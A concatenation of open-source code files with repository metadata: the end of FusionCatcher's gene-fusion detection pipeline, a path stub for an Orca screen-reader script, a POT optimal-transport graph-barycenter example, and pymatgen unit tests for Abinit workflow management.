job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('focus.psl.'+str(i)),kind='output',dest_list='genegenespotlight') job.run() else: job.clean(fqm,temp_path=temp_flag) job.clean(fgenes[i],temp_path=temp_flag) if hasattr(job, "genegenespotlight"): job.sink(job.genegenespotlight, outdir('gene-gene-spotlight_final.psl.txt')) else: job.add('touch',kind='program') job.add('',outdir('gene-gene-spotlight_final.psl.txt'),kind='output') job.run() job.add(_FC_+'concatenate.py',kind='program') job.add('-f',outdir('gene-gene-spotlight_final.psl.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-spotlight_final.psl'),kind='output') job.run() if hasattr(job, "genegenespotlight"): job.clean(job.genegenespotlight,temp_path=temp_flag) #spanning_reads_spotlight = 2 mismatches_spotlight = 40 length_anchor2_spotlight = 150 #length_anchor_spotlight = 40 job.add(_FC_+'find_fusion_genes_psl2.py',kind='program') job.add('--input_mappings',outdir('gene-gene-spotlight_final.psl'),kind='input',temp_path=temp_flag) job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--input_genes_positions',datadir('genes.txt'),kind='input') job.add('--threshold_overlap',length_anchor_spotlight-1,kind='parameter') job.add('--mismatches',mismatches_spotlight,kind='parameter') job.add('--output',outdir('candidates_fusion_genes_reads_spotlight.txt'),kind='output') job.run() # summary the gene-gene mappings job.add(_FC_+'build_report_fusions_psl2.py',kind='program') job.add('--suporting_unique_reads',spanning_reads_spotlight,kind='parameter') job.add('--trim-complex',length_anchor_spotlight,kind='parameter') job.add('--anchor2',length_anchor2_spotlight,kind='parameter') job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input') job.add('--input_fastq',outdir('focus.fq'),kind='input',temp_path=temp_flag) job.add('--input_fusion_psl',outdir('candidates_fusion_genes_reads_spotlight.txt'),kind='input',temp_path=temp_flag) job.add('--input_unmapped_reads',outdir('reads_ids_unmapped.txt'),kind='input') job.add('--mismatches-gap',mismatches_spotlight,kind='parameter') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') if options.psl_visualization and not empty(datadir('genome.2bit')): job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input') job.add('--psl_alignment_type','web',kind='parameter') if _BT_: job.add('--blat-dir',_BT_,kind='parameter') if options.sam_visualization: job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input') job.add('--sam_alignment','20',kind='parameter') job.add('--threads',options.processes,kind='parameter') if _B2_: job.add('--bowtie2-dir',_B2_,kind='parameter') if options.assembly: job.add('--velvet',kind='parameter') if _VT_: job.add('--velvet-dir',_VT_,kind='parameter') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_SPOTLIGHT.txt'),kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_SPOTLIGHT.zip'),kind='output') job.run() # # merge all reports # job.add(_FC_+'merge_reports.py',kind='program') job.add('--input_ambiguous',outdir('all_ambiguous_genes.txt'),kind='input',temp_path=temp_flag) job.add('--input_bowtie',outdir('candidate_fusion_genes_summary_BOWTIE.txt'),kind='input',temp_path=temp_flag) job.add('--input_candidate_fusion_genes',outdir('candidate_fusion-genes_further.txt'),kind='input',temp_path=temp_flag) job.add('--anchor2',length_anchor2,kind='parameter') if (not options.skip_blat) and (not empty(outdir('candidate_fusion_genes_summary_BLAT.txt'))): job.add('--supporting_pairs_blat',spanning_pairs_blat,kind='parameter') job.add('--supporting_reads_blat',spanning_reads_blat,kind='parameter') job.add('--input_blat',outdir('candidate_fusion_genes_summary_BLAT.txt'),kind='input',temp_path=temp_flag) if (not options.skip_star) and (not empty(outdir('candidate_fusion_genes_summary_STAR.txt'))): job.add('--supporting_pairs_star',spanning_pairs_star,kind='parameter') job.add('--supporting_reads_star',spanning_reads_star,kind='parameter') job.add('--input_star',outdir('candidate_fusion_genes_summary_STAR.txt'),kind='input',temp_path=temp_flag) if (not options.skip_bowtie2) and (not empty(outdir('candidate_fusion_genes_summary_BOWTIE2.txt'))): job.add('--supporting_pairs_bowtie2',spanning_pairs_bowtie2,kind='parameter') job.add('--supporting_reads_bowtie2',spanning_reads_bowtie2,kind='parameter') job.add('--input_bowtie2',outdir('candidate_fusion_genes_summary_BOWTIE2.txt'),kind='input',temp_path=temp_flag) if (not options.skip_spotlight) and (not empty(outdir('candidate_fusion_genes_summary_SPOTLIGHT.txt'))): job.add('--supporting_pairs_spotlight',spanning_pairs_spotlight,kind='parameter') job.add('--supporting_reads_spotlight',spanning_reads_spotlight,kind='parameter') job.add('--input_spotlight',outdir('candidate_fusion_genes_summary_SPOTLIGHT.txt'),kind='input',temp_path=temp_flag) # if (not options.skip_bwa) and (not empty(outdir('candidate_fusion_genes_summary_BWA.txt'))): # job.add('--supporting_pairs_bwa',spanning_pairs_bwa,kind='parameter') # job.add('--supporting_reads_bwa',spanning_reads_bwa,kind='parameter') # job.add('--input_bwa',outdir('candidate_fusion_genes_summary_BWA.txt'),kind='input',temp_path=temp_flag) if not options.long_report: job.add('--squish-report',kind='parameter') job.add('--output',outdir('final-list_candidate-fusion-genes-temp.txt'),kind='output') job.run() # predict effect of fusion job.add(_FC_+'label_found_fusions.py',kind='program') job.add('--data',datadir('readthroughs.txt'),kind='input') job.add('--input',outdir('final-list_candidate-fusion-genes-temp.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('final-list_candidate-fusion-genes-t2.txt'),kind='output') job.add('--data-not-commutative',kind='parameter') job.add('--label','readthrough',kind='parameter') job.run() # label exon-exon borders job.add(_FC_+'label_exonexon.py',kind='program') job.add('--gtf',datadir('organism.gtf'),kind='input') job.add('--input',outdir('final-list_candidate-fusion-genes-t2.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('final-list_candidate-fusion-genes-t3.txt'),kind='output') job.run() # label exon-exon borders job.add(_FC_+'label_rtcircrna.py',kind='program') job.add('--input',outdir('final-list_candidate-fusion-genes-t3.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('final-list_candidate-fusion-genes-t4.txt'),kind='output') job.run() # inspect fusion sequences job.add(_FC_+'inspect_fusion_sequences.py',kind='program') job.add('--input',outdir('final-list_candidate-fusion-genes-t4.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('final-list_candidate-fusion-genes-t5.txt'),kind='output') job.add('--threshold','2.0',kind='parameter') job.add('--threshold2','1.5',kind='parameter') job.add('--remove-poly',info_file,kind='output') job.run() # inspect fusion sequences for banned sequences job.add(_FC_+'filter_fusion_sequences.py',kind='program') job.add('--input',outdir('final-list_candidate-fusion-genes-t5.txt'),kind='input',temp_path=temp_flag) job.add('--banned',datadir('banned_seq.fa'),kind='input') job.add('--output',outdir('final-list_candidate-fusion-genes-t6.txt'),kind='output') job.add('--removed',outdir('final-list_candidate-fusion-genes-t6_removed.txt'),kind='output') job.run() job.add('printf',kind='program') job.add('"\n\nCandidate fusions removed due to banned fusion sequences: %s\n--------------------------------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('final-list_candidate-fusion-genes-t6_removed.txt'),kind='input',temp_path=temp_flag) job.add('>>',info_file,kind='output') job.run() # predict effect of fusion job.add(_FC_+'predict_frame.py',kind='program') job.add('--gtf',datadir('organism.gtf'),kind='input') job.add('--transcripts',datadir('transcripts.fa'),kind='input') job.add('--input',outdir('final-list_candidate-fusion-genes-t6.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('final-list_candidate-fusion-genes_sequences.txt'),kind='output') #fusion_transcripts_sequences: if options.compress_transcripts: job.add('--compress-transcripts',kind='parameter') job.run() job.add('zip',kind='program') job.add('-j',kind='parameter') job.add('',outdir('final-list_candidate-fusion-genes_sequences.txt.zip'),kind='output') job.add('',outdir('final-list_candidate-fusion-genes_sequences.txt'),kind='input') job.run() job.add('cut',kind='program') job.add('-f','1-16',kind='parameter') job.add('',outdir('final-list_candidate-fusion-genes_sequences.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('final-list_candidate-fusion-genes_.txt'),kind='output') job.run() job.add(_FC_+'filter-wiggle.py',kind='program') job.add('-i',outdir('final-list_candidate-fusion-genes_.txt'),kind='input',temp_path=temp_flag) job.add('-o',outdir('final-list_candidate-fusion-genes.txt'),kind='output') job.run() job.add(_FC_+'fc2vcf.py',kind='program') job.add('-i',outdir('final-list_candidate-fusion-genes.txt'),kind='input') job.add('-n',outdir('info.txt'),kind='input') job.add('-o',outdir('final-list_candidate-fusion-genes.vcf'),kind='output') job.run() if not options.skip_conversion_grch37: human = [line for line in file(datadir('version.txt'),'r').readlines() if line.lower().find('homo sapiens')!=-1 or line.lower().find('grch38')!=-1] #print "Human Genome GRCh38 found!" if human and len(human) == 2: # predict effect of fusion job.add(_FC_+'liftover.py',kind='program') job.add('--input',outdir('final-list_candidate-fusion-genes.txt'),kind='input') job.add('--chain',datadir('hg38ToHg19.over.chain.gz'),kind='input') job.add('--output',outdir('final-list_candidate-fusion-genes.hg19.txt'),kind='output') if _LR_: job.add('--path-liftover',_LR_,kind='parameter',checksum='no') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() # predict effect of fusion job.add(_FC_+'build_summary.py',kind='program') job.add('--input',outdir('final-list_candidate-fusion-genes.txt'),kind='input') job.add('--viruses',outdir('viruses_bacteria_phages.txt'),kind='input') job.add('--output',outdir('summary_candidate_fusions.txt'),kind='output') job.run() job.link(datadir('final-list_candidate-fusion-genes.caption.md.txt'), outdir('final-list_candidate-fusion-genes.caption.md.txt'), temp_path = 'no', kind = 'copy') job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'(NR==1) || (($3>%d) && ($7=="skipped"))'""" % (spanning_pairs_minimum-1,),outdir('preliminary-list_candidate-fusion-genes.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"4,5",kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add("'\\t'","'/'",kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('>',outdir('junk-chimeras.txt'),kind='output') job.run() # save the preliminary candidates to info file info(job, fromfile = outdir('preliminary-list_candidate-fusion-genes.txt'), tofile = info_file, top = ["\n\n\n===========================================", "Preliminary list of candidate fusion genes:", "==========================================="], bottom = "\n\n\n", temp_path = temp_flag if not options.keep_preliminary else 'no') # # CLEANING # if hasattr(job,'gg2seq'): job.clean(job.gg2seq,temp_path=temp_flag) if hasattr(job,'gg2nuc'): job.clean(job.gg2nuc,temp_path=temp_flag) to_delete_list_files = [ outdir('gene-gene_split_blat.fa'), outdir('gene-gene_split_blat.len'), outdir('gene-gene_split_bowtie2.fa'), outdir('gene-gene_split_bowtie2.len'), outdir('gene-gene_split_star.len'), outdir('gene-gene_split_star.fa'), outdir('gene-gene_split_bwa.fa'), outdir('gene-gene_split_bwa.len') ] job.clean(to_delete_list_files,list_file = "yes",temp_path=temp_flag) to_delete = [ outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'), outdir('candidate_fusion-genes_further.txt'), outdir('candidate_fusion-genes_supporting_paired-reads.txt'), outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'), outdir('pre-fusion'), outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'), outdir('candidate_focus_genes.txt'), outdir('candidate_focus_reads.txt'), outdir('gene-gene-bowtie_star_unique.fa'), outdir('gene-gene-bowtie_bowtie2_unique.fa'), outdir('exon-exon_junction_cut_split.fa'), outdir('eporcrlf2.txt'), outdir('all_ambiguous_genes.txt'), outdir('candidate_fusion-genes_exon-exon.txt'), outdir('candidate_fusion-genes_further.txt'), outdir('candidate_fusion-genes_missing_mates.txt'), outdir('count_reads_left_after_filtering.txt'), outdir('gene-gene.2bit'), outdir('gene-gene.fa'), outdir('gene-gene-star/'), outdir('gene-gene-bowtie2/'), outdir('gene-gene-star-results/'), outdir('gene-gene_longest.txt'), outdir('gene-gene_unique.fa'), outdir('original.fq'), outdir('focus.fq'), outdir('original.fq.gz'), outdir('originala.fq'), outdir('originala.fq.gz'), outdir('original_important.fq.gz'), outdir('original_important.txt'), outdir('reads_filtered_mapped-transcriptome.fq'), outdir('reads-filtered_multiple-mappings-genome.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'), outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_end.map'), outdir('reads_filtered_transcriptome_sorted-read_end_important.map'), outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'), outdir('split_gene-gene_star_unmapped_final.psl'), outdir('list_candidates_ambiguous_homologous_genes.txt'), outdir('candidate_fusion-genes_no-offending-reads.txt'), outdir('reads_ids_unmapped.txt'), outdir('reads_gene-gene.fq'), outdir('exon-exon_junction_cut__seq.txt'), outdir('exon-exon_junction_cut__nuc.txt'), outdir('gene-gene_unique__nuc.txt'), outdir('gene-gene__nuc.txt'), outdir('gene-gene__seq.txt'), outdir('gene-gene2__nuc.txt'), outdir('gene-gene2__seq.txt'), outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.final.map'), outdir('candidate_fusion-genes_fragments.txt'), outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'), outdir('gene-gene_unique__seq.txt'), outdir('log_lengths_original_reads.txt'), outdir('log_lengths_original_reads_plus.txt'), outdir('log_lengths_original_reads_final.txt'), outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_map.stdout.txt'), outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_multiple_map.stdout.txt'), outdir('log_bowtie_reads-filtered-out.stdout.txt'), outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt'), outdir('log_bowtie_reads_mapped-genome.stdout.txt'), outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome.stdout.txt'), outdir('log_bowtie_reads_unique-mapped-genome_mapped-transcriptome.stdout.txt'), outdir('log_bowtie_reads-unmapped-filtered-out-genome-blat_last.stdout.txt'), outdir('log_bowtie_reads-unmapped-filtered-out-genome_last.stdout.txt'), outdir('log_bowtie_reads-unmapped-filtered-out-genome.stdout.txt'), outdir('log_bowtie_reads-unmapped-filtered-out-transcriptome.stdout.txt'), outdir('log_lengths_reads.txt'), outdir('log_minimum_length_short_read.txt'), outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'), outdir('log_number_of_reads_processed.txt'), outdir('log_overlaps_error.txt'), outdir('log_lengths_reads_gene-gene_no-str.txt'), outdir('log_counts_reads_gene-gene_no-str.txt'), outdir('candidate_fusion-genes_further_paired-reads.txt'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'), outdir('log_removed_single_reads1.txt'), outdir('candidate_fusion-genes_further_mark.txt'), outdir('star_sdjboverhang.txt'), outdir('split_gene-gene_star_final.psl'), outdir('split_gene-gene_bowtie2_final.psl'), outdir('split_gene-gene_bwa_final.psl'), outdir('single/'), outdir('restart.sh')] job.clean(to_delete,temp_path=temp_flag) if urls: job.unprotect(urls) job.clean(new_input_output,temp_path = temp_flag) job.clean(tmp_dir,temp_path='yes') job.close() # #The End! #
ndaniel/fusioncatcher
bin/fusioncatcher.py
Python
gpl-3.0
801,064
[ "BWA", "Biopython", "Bowtie" ]
14fa4cc51324b66c4d847e53fe92024b011e5c1230eda33bea09a6cbbc931048
../../../../../../../share/pyshared/orca/scripts/toolkits/Gecko/script.py
Alberto-Beralix/Beralix
i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/scripts/toolkits/Gecko/script.py
Python
gpl-3.0
73
[ "ORCA" ]
56637d5b6e63b71a6c44d99e51896d00eac50df6f6053ffb4fee30f323436763
# -*- coding: utf-8 -*- """ ================================= Plot graphs' barycenter using FGW ================================= This example illustrates the computation barycenter of labeled graphs using FGW Requires networkx >=2 .. [18] Vayer Titouan, Chapel Laetitia, Flamary R{\'e}mi, Tavenard Romain and Courty Nicolas "Optimal Transport for structured data with application on graphs" International Conference on Machine Learning (ICML). 2019. """ # Author: Titouan Vayer <titouan.vayer@irisa.fr> # # License: MIT License #%% load libraries import numpy as np import matplotlib.pyplot as plt import networkx as nx import math from scipy.sparse.csgraph import shortest_path import matplotlib.colors as mcol from matplotlib import cm from ot.gromov import fgw_barycenters #%% Graph functions def find_thresh(C, inf=0.5, sup=3, step=10): """ Trick to find the adequate thresholds from where value of the C matrix are considered close enough to say that nodes are connected Tthe threshold is found by a linesearch between values "inf" and "sup" with "step" thresholds tested. The optimal threshold is the one which minimizes the reconstruction error between the shortest_path matrix coming from the thresholded adjency matrix and the original matrix. Parameters ---------- C : ndarray, shape (n_nodes,n_nodes) The structure matrix to threshold inf : float The beginning of the linesearch sup : float The end of the linesearch step : integer Number of thresholds tested """ dist = [] search = np.linspace(inf, sup, step) for thresh in search: Cprime = sp_to_adjency(C, 0, thresh) SC = shortest_path(Cprime, method='D') SC[SC == float('inf')] = 100 dist.append(np.linalg.norm(SC - C)) return search[np.argmin(dist)], dist def sp_to_adjency(C, threshinf=0.2, threshsup=1.8): """ Thresholds the structure matrix in order to compute an adjency matrix. All values between threshinf and threshsup are considered representing connected nodes and set to 1. Else are set to 0 Parameters ---------- C : ndarray, shape (n_nodes,n_nodes) The structure matrix to threshold threshinf : float The minimum value of distance from which the new value is set to 1 threshsup : float The maximum value of distance from which the new value is set to 1 Returns ------- C : ndarray, shape (n_nodes,n_nodes) The threshold matrix. Each element is in {0,1} """ H = np.zeros_like(C) np.fill_diagonal(H, np.diagonal(C)) C = C - H C = np.minimum(np.maximum(C, threshinf), threshsup) C[C == threshsup] = 0 C[C != 0] = 1 return C def build_noisy_circular_graph(N=20, mu=0, sigma=0.3, with_noise=False, structure_noise=False, p=None): """ Create a noisy circular graph """ g = nx.Graph() g.add_nodes_from(list(range(N))) for i in range(N): noise = float(np.random.normal(mu, sigma, 1)) if with_noise: g.add_node(i, attr_name=math.sin((2 * i * math.pi / N)) + noise) else: g.add_node(i, attr_name=math.sin(2 * i * math.pi / N)) g.add_edge(i, i + 1) if structure_noise: randomint = np.random.randint(0, p) if randomint == 0: if i <= N - 3: g.add_edge(i, i + 2) if i == N - 2: g.add_edge(i, 0) if i == N - 1: g.add_edge(i, 1) g.add_edge(N, 0) noise = float(np.random.normal(mu, sigma, 1)) if with_noise: g.add_node(N, attr_name=math.sin((2 * N * math.pi / N)) + noise) else: g.add_node(N, attr_name=math.sin(2 * N * math.pi / N)) return g def graph_colors(nx_graph, vmin=0, vmax=7): cnorm = mcol.Normalize(vmin=vmin, vmax=vmax) cpick = cm.ScalarMappable(norm=cnorm, cmap='viridis') cpick.set_array([]) val_map = {} for k, v in nx.get_node_attributes(nx_graph, 'attr_name').items(): val_map[k] = cpick.to_rgba(v) colors = [] for node in nx_graph.nodes(): colors.append(val_map[node]) return colors ############################################################################## # Generate data # ------------- #%% circular dataset # We build a dataset of noisy circular graphs. # Noise is added on the structures by random connections and on the features by gaussian noise. np.random.seed(30) X0 = [] for k in range(9): X0.append(build_noisy_circular_graph(np.random.randint(15, 25), with_noise=True, structure_noise=True, p=3)) ############################################################################## # Plot data # --------- #%% Plot graphs plt.figure(figsize=(8, 10)) for i in range(len(X0)): plt.subplot(3, 3, i + 1) g = X0[i] pos = nx.kamada_kawai_layout(g) nx.draw(g, pos=pos, node_color=graph_colors(g, vmin=-1, vmax=1), with_labels=False, node_size=100) plt.suptitle('Dataset of noisy graphs. Color indicates the label', fontsize=20) plt.show() ############################################################################## # Barycenter computation # ---------------------- #%% We compute the barycenter using FGW. Structure matrices are computed using the shortest_path distance in the graph # Features distances are the euclidean distances Cs = [shortest_path(nx.adjacency_matrix(x)) for x in X0] ps = [np.ones(len(x.nodes())) / len(x.nodes()) for x in X0] Ys = [np.array([v for (k, v) in nx.get_node_attributes(x, 'attr_name').items()]).reshape(-1, 1) for x in X0] lambdas = np.array([np.ones(len(Ys)) / len(Ys)]).ravel() sizebary = 15 # we choose a barycenter with 15 nodes A, C, log = fgw_barycenters(sizebary, Ys, Cs, ps, lambdas, alpha=0.95, log=True) ############################################################################## # Plot Barycenter # ------------------------- #%% Create the barycenter bary = nx.from_numpy_matrix(sp_to_adjency(C, threshinf=0, threshsup=find_thresh(C, sup=100, step=100)[0])) for i, v in enumerate(A.ravel()): bary.add_node(i, attr_name=v) #%% pos = nx.kamada_kawai_layout(bary) nx.draw(bary, pos=pos, node_color=graph_colors(bary, vmin=-1, vmax=1), with_labels=False) plt.suptitle('Barycenter', fontsize=20) plt.show()
rflamary/POT
examples/plot_barycenter_fgw.py
Python
mit
6,357
[ "Gaussian" ]
efd33d1bee93cb577a4f40b0e3dd15fb170faff252e522c9a3597da9f6dd9bdd
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. from __future__ import unicode_literals, division, print_function import os import tempfile import shutil from pymatgen.util.testing import PymatgenTest from monty.functools import lazy_property from pymatgen.core.lattice import Lattice from pymatgen.core.structure import Structure from pymatgen.io.abinit import * from pymatgen.io.abinit.flows import * from pymatgen.io.abinit.works import * from pymatgen.io.abinit.tasks import * from pymatgen.io.abinit.pseudos import Pseudo _test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", "..", 'test_files', "abinit") def ref_file(filename): return os.path.join(_test_dir, filename) class FakeAbinitInput(object): """Emulate an Abinit input.""" @lazy_property def pseudos(self): return [Pseudo.as_pseudo(ref_file("14si.pspnc"))] @lazy_property def structure(self): coords = [] coords.append([0, 0, 0]) coords.append([0.75, 0.5, 0.75]) lattice = Lattice([[3.8401979337, 0.00, 0.00], [1.9200989668, 3.3257101909, 0.00], [0.00, -2.2171384943, 3.1355090603]]) return Structure(lattice, ["Si", "Si"], coords) def get(self, key, default=None): """The real AbinitInput is a dict-like object.""" if default is not None: return default return key class FlowUnitTest(PymatgenTest): """Provides helper function for testing Abinit flows.""" MANAGER = """\ policy: autoparal: 1 qadapters: - &batch priority: 1 queue: qtype: slurm qname: Oban qparams: mail_user: nobody@nowhere limits: timelimit: 0:20:00 min_cores: 4 max_cores: 12 #condition: {"$eq": {omp_threads: 2}} hardware: num_nodes: 10 sockets_per_node: 1 cores_per_socket: 2 mem_per_node: 4 Gb job: modules: - intel/compilerpro/13.0.1.117 - fftw3/intel/3.3 shell_env: PATH: /home/user/tmp_intel13/src/98_main/:/home/user//NAPS/intel13/bin:$PATH LD_LIBRARY_PATH: /home/user/NAPS/intel13/lib:$LD_LIBRARY_PATH mpi_runner: mpirun # Connection to the MongoDb database (optional) db_connector: database: abinit collection: test #host: 0.0.0.0 #port: 8080 #user: gmatteo #password: helloworld batch_adapter: *batch """ def setUp(self): """Initialization phase.""" super(FlowUnitTest, self).setUp() # Temporary directory for the flow. self.workdir = tempfile.mkdtemp() # Create the TaskManager. self.manager = TaskManager.from_string(self.MANAGER) # Fake input file self.fake_input = FakeAbinitInput() def tearDown(self): """Delete workdir""" shutil.rmtree(self.workdir) class FlowTest(FlowUnitTest): def test_base(self): """Testing Flow...""" aequal, atrue, afalse = self.assertEqual, self.assertTrue, self.assertFalse flow = Flow(workdir=self.workdir, manager=self.manager) # Build a work with a task work = flow.register_task(self.fake_input) assert work.is_work task0_w0 = work[0] atrue(task0_w0.is_task) print(task0_w0.status.colored) atrue(len(flow) == 1) aequal(flow.num_tasks, 1) atrue(flow.has_db) #print(task0_w0.input_structure) print(task0_w0.make_input) # Task history assert len(task0_w0.history) == 0 task0_w0.history.info("Hello %s", "world") assert len(task0_w0.history) == 1 print(task0_w0.history) record = task0_w0.history.pop() print(record, repr(record)) assert record.get_message(asctime=False) == "Hello world" assert len(task0_w0.history) == 0 assert flow.select_tasks(nids=task0_w0.node_id)[0] == task0_w0 assert flow.select_tasks(wslice=slice(0,1,1)) == [task0_w0] # Build a workflow containing two tasks depending on task0_w0 work = Work() atrue(work.is_work) work.register(self.fake_input) work.register(self.fake_input) aequal(len(work), 2) flow.register_work(work, deps={task0_w0: "WFK"}) atrue(flow.is_flow) aequal(len(flow), 2) # Add another work without dependencies. task0_w2 = flow.register_task(self.fake_input)[0] atrue(len(flow) == 3) afalse(flow.is_work) # Allocate internal tables flow.allocate() # Check dependecies. atrue(flow[1].depends_on(task0_w0)) atrue(flow[1][0].depends_on(task0_w0)) atrue(flow[1][0] in task0_w0.get_children()) atrue(task0_w0 in flow[1][0].get_parents()) afalse(flow[2][0].depends_on(task0_w0)) afalse(flow[2][0] in task0_w0.get_children()) afalse(task0_w0 in flow[2][0].get_parents()) aequal(flow[1].pos, 1) aequal(flow[1][0].pos, (1, 0)) aequal(flow[2][0].pos, (2, 0)) afalse(flow.all_ok) aequal(flow.num_tasks, 4) aequal(flow.ncores_used, 0) # API for iterations aequal(len(list(flow.iflat_tasks(status="Initialized"))), sum(len(work) for work in flow)) aequal(list(flow.iflat_tasks(nids=task0_w0.node_id)), [task0_w0]) aequal([task0_w0], flow.tasks_from_nids(task0_w0.node_id)) aequal([(0, 0)], flow.wti_from_nids(task0_w0.node_id)) aequal([task0_w2], flow.tasks_from_nids([task0_w2.node_id])) aequal([(2, 0)], flow.wti_from_nids([task0_w2.node_id])) # Check for deadlocks flow.check_dependencies() # Save the flow in pickle format. flow.build_and_pickle_dump() # Find the pickle file in workdir and recreate the flow. same_flow = Flow.pickle_load(self.workdir) aequal(same_flow, flow) # to/from string # FIXME This does not work with py3k #s = flow.pickle_dumps(protocol=0) #same_flow = Flow.pickle_loads(s) #aequal(same_flow, flow) self.assertMSONable(flow) flow.show_info() flow.show_summary() flow.show_inputs() flow.show_inputs(varnames="znucl") # Test show_status flow.show_status() flow.show_event_handlers() def test_workdir(self): """Testing if one can use workdir=None in flow.__init__ and then flow.allocate(workdir).""" flow = Flow(workdir=None, manager=self.manager) flow.register_task(self.fake_input) #flow.register_work(work) work = Work() work.register_scf_task(self.fake_input) flow.register_work(work) # If flow.workdir is None, we should used flow.allocate(workdir) with self.assertRaises(RuntimeError): flow.allocate() tmpdir = tempfile.mkdtemp() flow.allocate(workdir=tmpdir) print(flow) assert len(flow) == 2 flow.build() for i, work in enumerate(flow): assert work.workdir == os.path.join(tmpdir, "w%d" % i) for t, task in enumerate(work): assert task.workdir == os.path.join(work.workdir, "t%d" % t) class TestFlowInSpectatorMode(FlowUnitTest): def test_spectator(self): flow = Flow(workdir=self.workdir, manager=self.manager) work0 = Work() work0.register_scf_task(self.fake_input) work0.register_scf_task(self.fake_input) work1 = Work() work1.register_scf_task(self.fake_input) flow.register_work(work0) flow.register_work(work1) flow.disconnect_signals() flow.disconnect_signals() flow.connect_signals() flow.connect_signals() for mode in [False, True]: flow.set_spectator_mode(mode=mode) assert flow.in_spectator_mode == mode for node in flow.iflat_nodes(): assert node.in_spectator_mode == mode assert len(list(flow.iflat_nodes())) == 1 + len(flow.works) + sum(len(work) for work in flow) assert flow.node_from_nid(flow.node_id) == flow flow.set_spectator_mode(mode=False) flow.build_and_pickle_dump() # picke load always returns a flow in spectator mode. flow = Flow.pickle_load(flow.workdir) assert flow.in_spectator_mode #with self.assertRaises(flow.SpectatorError): flow.pickle_dump() #with self.assertRaises(flow.SpectatorError): flow.make_scheduler().start() work = flow[0] assert work.send_signal(work.S_OK) is None #with self.assertRaises(work.SpectatorError): work.on_ok() #with self.assertRaises(work.SpectatorError): work.on_all_ok() task = work[0] assert task.send_signal(task.S_OK) is None #with self.assertRaises(task.SpectatorError): task._on_done() #with self.assertRaises(task.SpectatorError): task.on_ok() #with self.assertRaises(task.SpectatorError): task._on_ok() class TestBatchLauncher(FlowUnitTest): def test_batchlauncher(self): """Testing BatchLauncher methods.""" # Create the TaskManager. manager = TaskManager.from_string(self.MANAGER) print("batch_adapter", manager.batch_adapter) assert manager.batch_adapter is not None def build_flow_with_name(name): """Build a flow with workdir None and the given name.""" flow = Flow(workdir=None, manager=self.manager) flow.set_name(name) flow.register_task(self.fake_input) work = Work() work.register_scf_task(self.fake_input) flow.register_work(work) return flow from pymatgen.io.abinit.launcher import BatchLauncher tmpdir = tempfile.mkdtemp() batch = BatchLauncher(workdir=tmpdir, manager=manager) print(batch) flow0 = build_flow_with_name("flow0") flow1 = build_flow_with_name("flow1") flow2_same_name = build_flow_with_name("flow1") batch.add_flow(flow0) # Cannot add the same flow twice. with self.assertRaises(batch.Error): batch.add_flow(flow0) batch.add_flow(flow1) # Cannot add two flows with the same name. with self.assertRaises(batch.Error): batch.add_flow(flow2_same_name) batch.submit(dry_run=True) for i, flow in enumerate([flow0, flow1]): assert flow.workdir == os.path.join(batch.workdir, "flow%d" % i) batch.pickle_dump() batch_from_pickle = BatchLauncher.pickle_load(batch.workdir) assert all(f1 == f2 for f1, f2 in zip(batch.flows, batch_from_pickle.flows)) if __name__ == '__main__': import unittest2 as unittest unittest.main()
aykol/pymatgen
pymatgen/io/abinit/tests/test_flows.py
Python
mit
10,970
[ "ABINIT", "pymatgen" ]
ee8e5b849a2a5c6d6155fb2a2e456ee5dfd98af675b8890941f6662b23b31d1e
